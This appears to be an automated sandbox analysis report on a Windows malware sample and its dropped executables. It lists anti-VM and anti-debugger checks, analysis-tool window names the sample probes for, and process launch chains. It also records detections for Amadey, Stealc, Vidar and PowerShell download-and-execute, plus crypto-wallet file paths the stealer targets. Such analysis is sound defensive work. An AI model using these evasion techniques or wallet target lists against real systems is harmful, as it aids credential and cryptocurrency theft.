Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645513517.000001F414940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VMWare
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9c
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Thread information set: HideFromDebugger
Source: C:\Users\userKFHCAEGCBF.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Code function: 0_2_04C80081 Start: 04C8041B End: 04C800AA		0_2_04C80081
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Code function: 0_2_04C80B54 Start: 04C80B74 End: 04C80B70		0_2_04C80B54

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Code function: 0_2_04C80CC5 rdtsc

0_2_04C80CC5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_00404610 VirtualProtect ?,00000004,00000100,00000000

8_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

8_2_0041BA2C

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0034645B mov eax, dword ptr fs:[00000030h]	7_2_0034645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0034A1C2 mov eax, dword ptr fs:[00000030h]	7_2_0034A1C2
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_00419160 mov eax, dword ptr fs:[00000030h]	8_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_00405000 GetProcessHeap,HeapAlloc,memcpy,

8_2_00405000

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041C8D9 SetUnhandledExceptionFilter,	8_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6C1FB66C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C1FB1F7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C3AAC62

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_6C3F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

8_2_6C3F4760

Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0032D312 cpuid

7_2_0032D312

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0032CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0032CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8NjcvPNvUr.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2597088663.0000000000C11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1671801821.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1675477265.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2918910724.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686962382.0000000000251000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2917060920.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2581050540.0000000000C31000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2894591592.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2583529473.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2624183793.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1646914166.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2556118142.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1715844262.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1712103381.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2288311449.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2539138364.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: \jaxx\Local Storage\
